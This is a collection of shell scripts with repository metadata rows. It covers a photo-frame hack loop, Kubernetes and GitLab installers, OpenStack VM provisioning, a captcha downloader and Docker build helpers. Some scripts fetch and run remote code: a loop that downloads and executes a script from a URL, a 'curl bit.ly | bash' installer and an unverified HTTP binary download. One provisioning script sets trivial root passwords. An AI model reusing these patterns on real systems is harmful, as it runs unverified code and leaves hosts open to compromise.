/data/user/hack/busybox-armv7lv1_31 route add -host alibabadns.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host b.yahoo.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host yahoo.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host n.shifen.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host shifen.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host r6.mo.n.shifen.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host ias.tencent-cloud.net reject
/data/user/hack/busybox-armv7lv1_31 route add -host tencent-cloud.net reject
/data/user/hack/busybox-armv7lv1_31 route add -host ec2-52-41-236-57.us-west-2.compute.amazonaws.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host compute.amazonaws.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host fota5.adup.cn reject
/data/user/hack/busybox-armv7lv1_31 route add -host adup.cn reject
/data/user/hack/busybox-armv7lv1_31 route add -host rqd.uu.qq.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host hwfotadown.mayitek.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host newupdater.api.eaglenet.cn reject
echo "$(date) blackhole hosts added..." >> $LOGFILE
echo "Waiting initial loop..."
echo "$(date) Waiting initial loop..." >> $LOGFILE
sleep 60
am start -n "com.allwinner.digitalphotoframe.showallapp/.MainActivity"
am start -n "com.allwinner.theatreplayer.album/.ui.GalleryActivity"
sleep 1
input keyevent 21
input keyevent 21
input keyevent 21
input keyevent 21
sleep 1
input keyevent 22
input keyevent 22
input keyevent 20
input keyevent 23
# NTP Set Time
echo "$(date) Retreiving time from pool.ntp.org" >> $LOGFILE
/data/user/hack/busybox-armv7lv1_31 ntpd -d -n -q -p pool.ntp.org
# Download Config
echo "Retreiving $URL$CONFIG"
echo "$(date) Retreiving $URL$CONFIG" >> $LOGFILE
rm $IMAGEDIR/$CONFIG
/data/user/hack/busybox-armv7lv1_31 wget -P $IMAGEDIR $URL$CONFIG
# Read Config
line=""
TIMEOUT=120
input=$IMAGEDIR/$CONFIG
echo "$(date) read $input" >> $LOGFILE
read -r line < "$input"
if [ -z "$line" ];
then
TIMEOUT=1200
else
TIMEOUT=$line
fi
echo "$(date) Initial finished. Going to loop in $TIMEOUT..." >> $LOGFILE
# Loopsection
while [ -f "$MUTEX" ];
do
echo "$(date) Sleeping for $TIMEOUT"
echo "$(date) Sleeping for $TIMEOUT" >> $LOGFILE
sleep $TIMEOUT
# Download Shell-Skript
echo "Retreiving $URL$SCRIPT"
echo "$(date) Retreiving $URL$SCRIPT" >> $LOGFILE
rm $IMAGEDIR/$SCRIPT
rm /data/user/hack/$SCRIPT
/data/user/hack/busybox-armv7lv1_31 wget -P $IMAGEDIR $URL$SCRIPT
cp $IMAGEDIR/$SCRIPT /data/user/hack/$SCRIPT
chmod 755 /data/user/hack/$SCRIPT
if [ -e "/data/user/hack/$SCRIPT" ];
then
echo "$(date) Executing copied /data/user/hack/$SCRIPT" >> $LOGFILE
sh /data/user/hack/$SCRIPT
fi
# Download Index
# busybox wget (with repaired /etc/resolv.conf for busybox nslookup!!)
/data/user/hack/busybox-armv7lv1_31 wget -P $IMAGEDIR $URL
# get hrefs/jpg from index.html and cut everything out
grep -Eoi '<a href="[^>]+jpg"><img' $IMAGEDIR/index.html | grep -Eoi '"[^>]+jpg"' | busybox tr -d '"' > $IMAGEDIR/imagelist.txt
rm $IMAGEDIR/index.html
# Download Images
line=""
input=$IMAGEDIR/imagelist.txt
while IFS= read -r line
do
echo "Retreiving $URL$line"
echo "$(date) Retreiving $URL$line" >> $LOGFILE
/data/user/hack/busybox-armv7lv1_31 wget -P $IMAGEDIR $URL$line
done < "$input"
# Reset ActivityManager
echo "Restarting ActivityManager"
echo "$(date) Restarting ActivityManager" >> $LOGFILE
am restart
sleep 45
am start -n "com.allwinner.digitalphotoframe.showallapp/.MainActivity"
am start -n "com.allwinner.theatreplayer.album/.ui.GalleryActivity"
# check IR/Key-Inputs with getevent -c 2
sleep 1
input keyevent 21
input keyevent 21
input keyevent 21
input keyevent 21
sleep 1
input keyevent 22
input keyevent 22
input keyevent 20
input keyevent 23
echo "$(date) SlideShow should be started..." >> $LOGFILE
PROCESSPID=$(busybox pidof -s dhcpcd)
if [ -z "$PROCESSPID" ];
then
echo "process $PROCESSPID not running"
else
echo "process $PROCESSPID running"
fi
echo "$(date) looping loop.sh" >> $LOGFILE
done
echo "$(date) ending loop.sh - should never come to here..." >> $LOGFILE
echo "$(date) Manual Mutex-stop signal set. Exiting..." >> $LOGFILE | true |
d19f48446b7b0657c73ba933c586a5b9f42bcfa2 | Shell | belvinlabs/proost-app | /server/migrate.sh | UTF-8 | 720 | 3.53125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Display colorized warning output
function cwarn() {
COLOR='\033[01;31m' # bold red
RESET='\033[00;00m' # normal white
MESSAGE=${@:-"${RESET}Error: No message passed"}
echo -e "${COLOR}${MESSAGE}${RESET}"
}
cwarn "The migrate functionality picks up most of the changes made "\
"to models, but not all changes to models are detected. Please "\
"review your changes int hte migrations folder and if no new "\
"revision is made, you can use revision.sh to generate one manually."\
"\nMore inforation on what changes can be detected: "\
"https://alembic.sqlalchemy.org/en/latest/autogenerate.html#what-does"\
"-autogenerate-detect-and-what-does-it-not-detect"
export FLASK_APP=src/main
flask db migrate | true |
7d4265ae033278b9ba91f155032ee3c34db7ae05 | Shell | Satyricon/simple-node-backend | /test/test.sh | UTF-8 | 251 | 2.984375 | 3 | [] | no_license | #!/bin/bash
ip=$(kubectl get svc -n dev -o json | jq -r .items[0].status.loadBalancer.ingress[0].ip)
result=$(curl -s -o /dev/null -w "%{http_code}" $ip)
if [ $result -eq 200 ]
then
echo "All is fine"
exit 0
else
echo "Test fails"
exit 1
fi
| true |
d06e64e5e29e2fa89789b06ebd349c8264efd590 | Shell | electrocucaracha/krd | /aio.sh | UTF-8 | 4,182 | 3.46875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# SPDX-license-identifier: Apache-2.0
##############################################################################
# Copyright (c) 2018
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
set -o errexit
set -o nounset
set -o pipefail
if [ "${KRD_DEBUG:-false}" == "true" ]; then
set -o xtrace
export PKG_DEBUG=true
fi
# All-in-One deployments can't take advantage of image caching.
export KRD_DOWNLOAD_LOCALHOST=false
krd_actions_list=${KRD_ACTIONS_LIST:-install_k8s}
# Validators
if ! sudo -n "true"; then
echo ""
echo "passwordless sudo is needed for '$(id -nu)' user."
echo "Please fix your /etc/sudoers file. You likely want an"
echo "entry like the following one..."
echo ""
echo "$(id -nu) ALL=(ALL) NOPASSWD: ALL"
exit 1
fi
if [[ $(id -u) -eq 0 ]]; then
echo ""
echo "This script needs to be executed without using sudo command."
echo ""
exit 1
fi
# Install dependencies
# NOTE: Shorten link -> https://github.com/electrocucaracha/pkg-mgr_scripts
curl -fsSL http://bit.ly/install_pkg | PKG_UPDATE=true PKG_COMMANDS_LIST="hostname,wget,git" bash
# Validating local IP addresses in no_proxy environment variable
if [[ ${NO_PROXY+x} == "x" ]]; then
for ip in $(hostname --ip-address || hostname -i) $(ip addr | awk "/$(ip route | grep "^default" | head -n1 | awk '{ print $5 }')\$/ { sub(/\/[0-9]*/, \"\","' $2); print $2}'); do
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ && $NO_PROXY != *"$ip"* ]]; then
echo "The $ip IP address is not defined in NO_PROXY env"
exit 1
fi
done
fi
echo "Sync server's clock"
sudo date -s "$(wget -qSO- --max-redirect=0 google.com 2>&1 | grep Date: | cut -d' ' -f5-8)Z"
# Configuring KRD project
krd_folder="${KRD_FOLDER:-/opt/krd}"
if [ ! -d "$krd_folder" ]; then
echo "Cloning and configuring KRD project..."
sudo -E git clone --depth 1 https://github.com/electrocucaracha/krd "$krd_folder"
sudo chown -R "$USER": "$krd_folder"
fi
cd "$krd_folder" || exit
if [[ $krd_actions_list == *k8s* ]]; then
# Setup SSH keys
rm -f ~/.ssh/id_rsa*
sudo mkdir -p /root/.ssh/
echo -e "\n\n\n" | ssh-keygen -t rsa -N ""
if [ "$EUID" -ne "0" ]; then
# Attempt to copy file when non root else cmd fails with 'same file' message
sudo cp ~/.ssh/id_rsa /root/.ssh/id_rsa
fi
tee <~/.ssh/id_rsa.pub --append ~/.ssh/authorized_keys | sudo tee --append /root/.ssh/authorized_keys
chmod og-wx ~/.ssh/authorized_keys
hostname=$(hostname)
ip_address=$(hostname -I | awk '{print $1}')
sudo tee inventory/hosts.ini <<EOL
[all]
$hostname
[kube-master]
$hostname ansible_host=$ip_address ip=$ip_address
[kube-node]
$hostname ansible_host=$ip_address ip=$ip_address
[etcd]
$hostname ansible_host=$ip_address ip=$ip_address
[k8s-cluster:children]
kube-node
kube-master
EOL
fi
sudo -E ./node.sh
# Resolving Docker previous installation issues
if [ "${KRD_CONTAINER_RUNTIME:-docker}" == "docker" ] && command -v docker; then
echo "Removing docker previous installation"
# shellcheck disable=SC1091
source /etc/os-release || source /usr/lib/os-release
case ${ID,,} in
ubuntu | debian)
systemctl --all --type service | grep -q docker && sudo systemctl stop docker --now
sudo apt-get purge -y docker-ce docker-ce-cli moby-engine moby-cli moby-buildx || true
sudo rm -rf /var/lib/docker /etc/docker
sudo rm -rf /var/run/docker.sock
sudo rm -f "$(sudo netstat -npl | grep docker | awk '{print $NF}')"
;;
esac
fi
echo "Deploying KRD project"
for krd_action in ${krd_actions_list//,/ }; do
./krd_command.sh -a "$krd_action" | tee "krd_${krd_action}.log"
done
if [ -f /etc/apt/sources.list.d/docker.list ] && [ -f /etc/apt/sources.list.d/download_docker_com_linux_ubuntu.list ]; then
sudo rm /etc/apt/sources.list.d/docker.list
fi
| true |
2c34f459032f669bc066b2b615d5781f30308566 | Shell | lqhorochi/trojan-wiz | /test_menu.sh | UTF-8 | 348 | 2.953125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
a=$(which g++zz)
OPTION=$(whiptail --title "Menu Dialog" --menu "Choose your favorite programming language." 15 60 6 \
"1" "Python" \
$a :- "2" "Java" \
"3" "C" \
"4" "PHP" 3>&1 1>&2 2>&3)
exitstatus=$?
if [ $exitstatus = 0 ]; then
echo "Your favorite programming language is:" $OPTION
else
echo "You chose Cancel."
fi | true |
b25410dd566128c23f52ea46a6371715f6abbac5 | Shell | benaux/bkb-env | /toolsfiles/utils/cogo | UTF-8 | 179 | 3.140625 | 3 | [] | no_license | #!/bin/sh
if tmux has-session -t co; then
if [ -n "$1" ] ; then
tmux send-keys -t co "cd $1" Enter
else
cwd=$(pwd)
tmux send-keys -t co "cd $cwd" Enter
fi
fi
| true |
7c07b5fe58f9164ce7046f151b303a822df26743 | Shell | nlouwere1/cloud-tools | /build-tenant.sh | UTF-8 | 3,547 | 2.90625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#set -x
if [ ! "${OS_PASSWORD}" ]; then
source ~/keystonerc_admin
fi
aio_id=${1:-'231'}
compute_id=${2:-'241'}
an=${3:-'1'}
cn=${4:-'2'}
echo aio = ${aio_id}:${an} compute = ${compute_id}:${cn}
nova delete aio${aio_id} compute${compute_id}
sleep 5
cat > /tmp/aio-init.sh <<EOD
#!/bin/bash
passwd centos <<EOF
centos
centos
EOF
passwd root <<EOF
root
root
EOF
sed -e 's/^.*ssh-rsa/ssh-rsa/' -i /root/.ssh/authorized_keys
cat > /etc/sysconfig/network-scripts/ifcfg-eth0 <<EOF
DEVICE=eth0
BOOTPROTO=static
ONBOOT=yes
DNS1=10.1.1.92
DOMAIN=onecloud
IPADDR=10.1.64.${aio_id}
PREFIX=24
GATEWAY=10.1.64.1
DEFROUTE=YES
MTU=1400
EOF
cat > /etc/sysconfig/network-scripts/ifcfg-eth1 <<EOF
DEVICE=eth1
BOOTPROTO=static
ONBOOT=yes
IPADDR=10.1.65.${aio_id}
PREFIX=24
MTU=1400
EOF
cat > /etc/sysconfig/network-scripts/ifcfg-eth2 <<EOF
DEVICE=eth2
BOOTPROTO=static
ONBOOT=yes
MTU=1400
EOF
cat > /etc/resolv.conf <<EOF
nameserver 10.1.1.92
search onecloud
EOF
cat >> /etc/hosts <<EOF
10.1.64.${aio_id} aio${aio_id}.onecloud aio${aio_id}
10.1.64.${compute_id} compute${compute_id}.onecloud compute${compute_id}
10.1.64.1 gw.onecloud gw
EOF
cat >> /etc/hostname <<EOF
aio${aio_id}
EOF
hostname aio${aio_id}
ifdown eth0; ifup eth0; ifdown eth1; ifup eth1; ifdown eth2; ifup eth2
umount /mnt
sed -e '/vdb/d ' -i /etc/fstab
yum update -y
yum install bind-utils screen vim -y
EOD
cat > /tmp/compute-init.sh <<EOD
#!/bin/bash
passwd centos <<EOF
centos
centos
EOF
passwd root <<EOF
root
root
EOF
sed -e 's/^.*ssh-rsa/ssh-rsa/' -i /root/.ssh/authorized_keys
cat > /etc/sysconfig/network-scripts/ifcfg-eth0 <<EOF
DEVICE=eth0
BOOTPROTO=static
ONBOOT=yes
DNS1=10.1.1.92
DOMAIN=onecloud
IPADDR=10.1.64.${compute_id}
PREFIX=24
GATEWAY=10.1.64.1
DEFROUTE=YES
MTU=1400
EOF
cat > /etc/sysconfig/network-scripts/ifcfg-eth1 <<EOF
DEVICE=eth1
BOOTPROTO=static
ONBOOT=yes
IPADDR=10.1.65.${compute_id}
PREFIX=24
MTU=1400
EOF
cat > /etc/sysconfig/network-scripts/ifcfg-eth2 <<EOF
DEVICE=eth2
BOOTPROTO=static
ONBOOT=yes
MTU=1400
EOF
cat > /etc/resolv.conf <<EOF
nameserver 10.1.1.92
search onecloud
EOF
cat >> /etc/hosts <<EOF
10.1.64.${aio_id} aio${aio_id}.onecloud aio${aio_id}
10.1.64.${compute_id} compute${compute_id}.onecloud compute${compute_id}
10.1.64.1 gw.onecloud gw
EOF
cat >> /etc/hostname <<EOF
compute${compute_id}
EOF
hostname compute${compute_id}
ifdown eth0; ifup eth0; ifdown eth1; ifup eth1; ifdown eth2; ifup eth2
umount /mnt
sed -e '/vdb/d' -i /etc/fstab
yum update -y
yum install bind-utils screen vim emacs -y
EOD
sixtyfour=`neutron net-list | awk '/ sixtyfour / {print $2}'`
sixtyfive=`neutron net-list | awk '/ sixtyfive / {print $2}'`
flat=`neutron net-list | awk '/ flat / {print $2}'`
image=`glance image-list | awk '/ centos7 / {print $2}'`
# Only eth0 on VLAN 64 and eth1 on VLAN 65
nova boot --image ${image} --flavor os.large --nic net-id=${sixtyfour},v4-fixed-ip=10.1.64.${aio_id} \
--nic net-id=${sixtyfive},v4-fixed-ip=10.1.65.${aio_id} --nic net-id=${flat} --config-drive True \
--user-data /tmp/aio-init.sh --availability-zone nova:centos-${an}.onecloudinc.com --key-name class aio${aio_id}
nova boot --image ${image} --flavor os.medium --nic net-id=${sixtyfour},v4-fixed-ip=10.1.64.${compute_id} \
--nic net-id=${sixtyfive},v4-fixed-ip=10.1.65.${compute_id} --nic net-id=${flat} --config-drive True \
--user-data /tmp/compute-init.sh --availability-zone nova:centos-${cn}.onecloudinc.com --key-name class compute${compute_id}
echo "aio VNC"
vnc aio${aio_id}
echo "compute VNC"
vnc compute${compute_id}
| true |
43428506b314351c74f7defd5ce92bee7743bbe2 | Shell | jpstruhar/alohacam | /install.sh | UTF-8 | 3,288 | 4.1875 | 4 | [] | no_license | #!/bin/bash -e
# Check for dependencies.
hash curl grep openssl
DASHBOARD_URL=https://alohacam.io
API_URL=https://api.alohacam.io
DOWNLOAD_URL=http://get.alohacam.io
VERSION=latest
KEYFILE=key.pem
CERTFILE=cert.pem
CSRFILE=req.pem
REBOOT_REQUIRED=false
[ -e lanikai.env ] && source lanikai.env
# Identify platform and architecture.
if [ -z "$PLAT" ]; then
case "$OSTYPE" in
linux*)
PLAT=linux ;;
*)
echo "Unsupported platform: $OSTYPE"
exit 1 ;;
esac
fi
if [ -z "$ARCH" ]; then
case "$(uname -m)" in
armv6*)
ARCH=armv6 ;;
armv7*)
ARCH=armv7 ;;
aarch64*)
ARCH=aarch64 ;;
*)
echo "Unsupported architecture: $(uname -m)"
exit 1 ;;
esac
fi
# Download latest alohacam binary.
if [ -z "$SKIP_DOWNLOAD" ]; then
curl -L -o alohacam $DOWNLOAD_URL/release/$VERSION/alohacam-$PLAT-$ARCH
chmod a+x alohacam
fi
# Install rng-tools to ensure have sufficient entropy for certificates
if [ ! -e /usr/sbin/rngd ]; then
echo "Installing rng-tools to ensure sufficient entropy for generating"
echo "certificates (requires sudo)."
sudo apt-get install -y rng-tools
fi
# Generate a private key, if we don't already have one.
if [ ! -e $KEYFILE ]; then
echo "Generating private key"
openssl ecparam -name prime256v1 -genkey -out $KEYFILE
rm -f $CERTFILE
fi
# Request a certificate, if we don't already have one.
if [ ! -e $CERTFILE ]; then
if [ -z "$TOKEN" ]; then
echo "Visit the Alohacam dashboard to obtain an activation token for this device:"
echo " $DASHBOARD_URL/devices/"
while [ -z "$TOKEN" ]; do
read -r -p "Enter activation token: "
TOKEN=$(echo "$REPLY" | tr -cd '0-9A-Za-z')
done
fi
# Generate a certificate signing request. The activation token is included as
# the Subject Common Name.
openssl req -new -key $KEYFILE -subj "/CN=Activation:$TOKEN" -out $CSRFILE
# Submit CSR with activation request. If successful, we'll receive a PEM-encoded
# certificate in response.
if curl -fsSL -F "csr=<$CSRFILE" -o $CERTFILE "$API_URL/activate-device/$TOKEN"; then
echo "Success. You may now run Alohacam."
rm -f $CSRFILE
else
echo "Unable to activate your device."
echo "Try requesting a new activation code."
fi
fi
# Load v4l2 driver on boot (if not already enabled).
if ! grep -q "^bcm2835-v4l2$" /etc/modules; then
echo "Modifying /etc/modules to enable camera driver (requires sudo)"
sudo sh -c 'echo "bcm2835-v4l2" >> /etc/modules'
fi
if ! lsmod | grep -q "^bcm2835_v4l2"; then
echo "Loading camera driver (requires sudo)"
sudo modprobe bcm2835-v4l2
fi
# Ensure Raspberry Pi bootloader configured to enable camera.
if ! grep -q "^start_x=1$" /boot/config.txt; then
echo "Modifying /boot/config.txt to enable camera (requires sudo)"
sudo sh -c 'echo "start_x=1" >> /boot/config.txt'
REBOOT_REQUIRED=true
fi
# Reboot prompt.
if $REBOOT_REQUIRED; then
echo "Some changes require you to reboot your Raspberry Pi."
read -p "Reboot now (y/N)? " yesno
case $yesno in
[Yy]* ) sudo reboot;
esac
else
./alohacam
fi
| true |
e05d20c9076c487ee1c2b7fcbc97cdfda4e7eff3 | Shell | Lepidopterist/generic | /overlay/hooks/supervisord-pre.d/99_config_check.sh | UTF-8 | 195 | 2.6875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
set -e
echo "Currently configured config:"
/scripts/getconfig.sh /etc/nginx/nginx.conf
echo "Checking nginx config"
/usr/sbin/nginx -t
[ $? -ne 0 ] || echo "Config check successful"
| true |
5a713c522b144984510fa1469eebe9708962d5e8 | Shell | hugocortes/me | /deploy.sh | UTF-8 | 368 | 2.5625 | 3 | [] | no_license | #!/bin/bash
DOCKER_HUB=hugocortes/me
DATE=$(date +"%Y%m%d-%H%M")
echo "$DOCKER_PASSWORD" | docker login -u "$DOCKER_USERNAME" --password-stdin
docker build -t $DOCKER_HUB:latest .
docker tag $DOCKER_HUB:latest $DOCKER_HUB:release-$DATE-${TRAVIS_COMMIT:0:8}
docker build --build-arg baseURL=https://dev.hugocortes.dev -t $DOCKER_HUB:devel .
docker push $DOCKER_HUB
| true |
bef60a84c5c2c522dd3f1626372b790dcbd46b7a | Shell | JASHDO/ricogentoo | /app-backup/bacula/files/randpass-1.37.40 | UTF-8 | 677 | 3.5625 | 4 | [] | no_license | #! /bin/sh
#
# Generate a random password, written to standard output
# By John Walker
#
if test "x$1" = "x" ; then
PWL=48 # Password length in characters
else
PWL=$1
fi
tmp=`mktemp randpass.XXXXXXXXXX`
if test x$tmp = x; then
tmp=/tmp/p.tmp.$$
if test -f $tmp; then
echo "Temp file security problem on: $tmp"
exit 1
fi
fi
cp autoconf/randpass.bc $tmp
ps | sum | tr -d ':[:alpha:] ' | sed 's/^/k=/' >>$tmp
date | tr -d ':[:alpha:] ' | sed 's/^/k=k*/' >>$tmp
ls -l /tmp | sum | tr -d ':[:alpha:] ' | sed 's/^/k=k*/' >>$tmp
echo "j=s(k); for (i = 0; i < $PWL; i++) r()" >>$tmp
echo "quit" >>$tmp
bc $tmp | awk -f autoconf/randpass.awk
rm $tmp
| true |
fea326bbf48e631185a0e833b193464785a199a3 | Shell | galoscar07/college2k16-2k19 | /2nd Semester/Operating Systems/Operating Systems for the exam/Problems/Shell/11.sh | UTF-8 | 261 | 2.875 | 3 | [] | no_license | #! /bin/sh
# Scrie un script shell care citeste stringuri de la tastatura pana cand
# se introduc 3 nume de fisiere
while [ 1 -lt 3 ]; do
read x
if [ -f $x ]; then
read y
if [ -f $y ]; then
read y
if [ -f $y ]; then
exit 1
fi
fi
fi
done
| true |
190a5d387ce691f989140fbbf90b8123c9cc09b5 | Shell | xsub/accepted | /scripts/compile.sh | UTF-8 | 530 | 3.171875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# default test install dir (development version)
PREFIX=--prefix=/tmp/accepted-test
# force debug code off by default, this is used to test build before commiting in put.sh
FLAGS=CPPFLAGS='-DDEBUG_ON=0'
# if -d flag is there then force debug code on
if [ "$1" == "-d" ]
then
FLAGS=CPPFLAGS='-DDEBUG_ON=1'
PREFIX=--prefix=/tmp/accepted-test-debug/
fi
# remove previous version in this location
make clean
make uninstall
# rebuild and install
autoreconf --install
./configure $PREFIX $FLAGS
make install
| true |
65852a293859fbde78dedf32257ff0c34bbce088 | Shell | mhdzumair/ResolvoPro | /download_captcha.sh | UTF-8 | 907 | 4.03125 | 4 | [] | no_license | #!/bin/bash
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'
url=$1
dir=$2
downloads=$3
images=0
delay=30
if [ -z $url ] || [ -z $dir ] || [ -z $downloads ];
then
echo -e "${RED}Invalid Parameters ${NC}"
echo -e "${GREEN}\nUsage:${NC}\n\t./download_captcha.sh captcha_curl_url image_directory numbers_of_downloads\n"
exit
fi
if [ -d $dir ];
then
count=$(ls $dir| wc -l)
echo "$count images found"
((count++))
else
echo "create new directory"
mkdir $dir
count=1
fi
((downloads+=count-1))
while [ $count -le $downloads ]
do
if [ $images -eq 30 ];
then
echo "sleep $delay s"
sleep $delay
images=0
fi
echo downloading $count.png ...
curl $url --output $dir/$count.png --no-progress-meter --no-keepalive --tcp-fastopen
if [ $downloads -gt 20 ];
then
sleep 5
fi
((count++))
((images++))
done
exit
| true |
d0222ccb9d898d06ffd8e08bfdfc6ab9db2143f1 | Shell | couchbase/build-tools | /dockerhub/scripts/weekly-docker-build | UTF-8 | 1,640 | 3.984375 | 4 | [] | no_license | #!/bin/bash -e
script_dir=$(dirname $(readlink -e -- "${BASH_SOURCE}"))
build_tools_dir=$(git -C "${script_dir}" rev-parse --show-toplevel)
source ${build_tools_dir}/utilities/shell-utils.sh
min_timestamp=$(date +%s -d "1 week ago")
# Given a product/release/version, determine whether the most recent build
# number is less than one week old. If so, trigger Docker build.
function check_needed() {
product=$1
release=$2
version=$3
status "${product} ${release} ${version}"
if [[ "${product}" == "couchbase-server" && "${release}" == "master" ]]; then
status "... skipping branch-master builds"
return 0
fi
latest=$(dbapi_builds ${product} ${release} ${version} last_complete)
if [[ ${latest} == 0 ]]; then
status "... last build not known; skipping"
return 0
fi
status ... latest build number is ${latest}
timestamp=$(dbapi builds/${product}-${version}-${latest} | jq .timestamp)
if [[ ${timestamp} > ${min_timestamp} ]]; then
status "... Newer than 1 week old - will trigger build"
if [[ "${product}" == "sync_gateway" ]]; then
prodarg=sync-gateway
else
prodarg=${product}
fi
cat > ${prodarg}-${release}-${version}-dockerbuild.properties <<EOF
PRODUCT=${prodarg}
VERSION=${version}
BLD_NUM=${latest}
EOF
fi
}
for product in couchbase-server sync_gateway; do
for release in $(dbapi_releases ${product}); do
for version in $(
dbapi_versions ${product} ${release}
); do
check_needed ${product} ${release} ${version}
done
done
done
| true |
894210e6ff6e2c3d1ce041d60763f5b4ae20aad2 | Shell | cugoracle/ops_doc_linux | /gitlab/gitlab-ce安装.sh | UTF-8 | 3,265 | 2.59375 | 3 | [] | no_license | centos7安装gitlab
1、安装依赖关系
# yum -y groupinstall 'Development Tools'
# yum install curl policycoreutils openssh-server openssh-clients postfix
2、关闭防火墙、SeLinux
# systemctl stop firewalld
# sed -i 's@SELINUX=enforcing@SELINUX=disabled@g' /etc/sysconfig/selinux
# firewall-cmd --permanent --add-service=http
# systemctl reload firewalld
# setenforce 0
3、下载安装gitlab package
# vim /etc/yum.repos.d/gitlab-ce.repo
[gitlab-ce]
name=Gitlab CE Repository
baseurl=https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el$releasever/
gpgcheck=0
enabled=1
# yum -y install gitlab-ce
脚本如果无法运行,可以直接下载下来
# wget https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gitlab-ce-9.0.5-ce.0.el7.x86_64.rpm
# yum -y install gitlab-ce-9.0.5-ce.0.el7.x86_64.rpm
4、配置并启动gitlab
# gitlab-ctl reconfigure
# gitlab-ctl start
# firewall-cmd --permanent --zone=public --add-port=80/tcp
# vim /var/opt/gitlab/nginx/conf/gitlab-http.conf
server_name mail.bjwf125.com;
5、访问并设置密码
访问: http://mail.bjwf125.com #需要设置DNS,或者修改本机hosts文件
会提示你管理员账号密码重置
管理员用户名默认为root
6、可能遇到的问题
重新设置host
# rpm 安装 gitlab.yml 路径
# vi /var/opt/gitlab/gitlab-rails/etc/gitlab.yml
gitlab:
host: xxx.xxx.xx.xxx
7、一些坑
gitlabce的坑
#首先祭出gitlab强大的工具
gitlab-ctl tail; #查看当前服务器的日志,非常好用
gitlab-ctl reconfigure; #这个命令慎用 , 它会重新创建gitlab的代码, 然后你的gitlab就会恢复默认配置了(gitlab.yml)...
gitlab-ctl stop nginx; #停止对应的服务,由于我本机自己编译了个nginx , 所以我要吧gitlab自己打包的nginx干掉,不给启用.
#由于我自己的nginx是nobody身份启动,gitlab的目录是git账号的,然后坑爹的事情就来了 , 会出现很多权限报错:
connect() to unix:/data1/htdocs/gitlab.mmfei.com/tmp/sockets/gitlab.socket failed (2: No such file or directory)
connect() to unix:/var/opt/gitlab/gitlab-rails/sockets/gitlab.socket failed (13: Permission denied)
connect() to unix:/var/opt/gitlab/gitlab-git-http-server/socket failed (13: Permission denied)
#权限问题可以用下面的一刀切的方式解决 , 虽然不好 , 但是对于小白来说 , 已经够了
chmod 777 /usr/local/nginx.1.5.12/fastcgi_temp -R ;
chmod 777 /var/opt/gitlab/gitlab-rails/sockets;
chown git:git -R /opt/gitlab/embedded/service/gitlab-rails/public;
chmod 777 /var/opt/gitlab/gitlab-git-http-server/;
##一些收集的有意义的日志和目录.....
/opt/gitlab #holds application code for GitLab and its dependencies.
/var/opt/gitlab #holds application data and configuration files that gitlab-ctl reconfigure writes to.
/etc/gitlab #holds configuration files for omnibus-gitlab. These are the only files that you should ever have to edit manually.
/var/log/gitlab #contains all log data generated by components of omnibus-gitlab.
/var/log/gitlab/gitlab-rails/production.log;
/home/git/gitlab/config/gitlab.yml.example;
/home/git/gitlab/config/gitlab.yml;
/var/opt/gitlab/gitlab-rails/etc/gitlab.yml;
| true |
08531bc3c623b8f58215be4594cd6b3bd04b98d5 | Shell | SpringerPE/grafana-loki-boshrelease | /packages/loki/packaging | UTF-8 | 1,156 | 3.25 | 3 | [] | no_license | #!/usr/bin/env bash
set -e -x
BOSH_PACKAGES_DIR=${BOSH_PACKAGES_DIR:-/var/vcap/packages}
# Build
echo "Building and installing loki binaries ..."
mkdir -p ${BOSH_INSTALL_TARGET}/src
mkdir -p ${BOSH_INSTALL_TARGET}/bin
cp -a . ${BOSH_INSTALL_TARGET}/src
export GOPATH=${BOSH_INSTALL_TARGET}
export GOROOT=$(readlink -nf "${BOSH_PACKAGES_DIR}/golang")
export PATH=${GOROOT}/bin:${PATH}
export GOCACHE=/var/vcap/data/tmp/go
mkdir -p ${GOCACHE}
pushd ${BOSH_INSTALL_TARGET}/src/github.com/grafana/loki
CGO_ENABLED=0 go build -ldflags "-s -w -X github.com/grafana/loki/vendor/github.com/prometheus/common/version.Branch=dev -X github.com/grafana/loki/vendor/github.com/prometheus/common/version.Version=0.3.0-BOSH -X github.com/grafana/loki/vendor/github.com/prometheus/common/version.Revision=0.3.0" -tags netgo -o ${BOSH_INSTALL_TARGET}/bin/loki ./cmd/loki/main.go
popd
# clean up source artifacts
rm -rf ${BOSH_INSTALL_TARGET}/src ${BOSH_INSTALL_TARGET}/pkg
# copy binaries
chmod a+x ${BOSH_INSTALL_TARGET}/bin/*
# Install shell helpers
echo "Adding shell helpers ..."
mkdir -p ${BOSH_INSTALL_TARGET}
cp -av bosh-helpers ${BOSH_INSTALL_TARGET}/
| true |
33d63a41ee70eae3bed5f0e73d8c548330b3d279 | Shell | red-hat-storage/ocs-workloads | /mix-fs-rbd/run-io.sh | UTF-8 | 340 | 2.875 | 3 | [] | no_license | pgsqlPrefix=$1
logLocation=$2
for i in {1..1}; do
echo "Running IO on $pgsqlPrefix-$i"
echo "+++++++++++++++++++"
echo " run-workload-pgsql.sh $pgsqlPrefix-$i "
nohup sh run-workload-pgsql.sh $pgsqlPrefix-$i >$logLocation/$pgsqlPrefix-$i.log &
echo "IO started in $pgsqlPrefix-$i "
echo "____________________________"
sleep 5
done
| true |
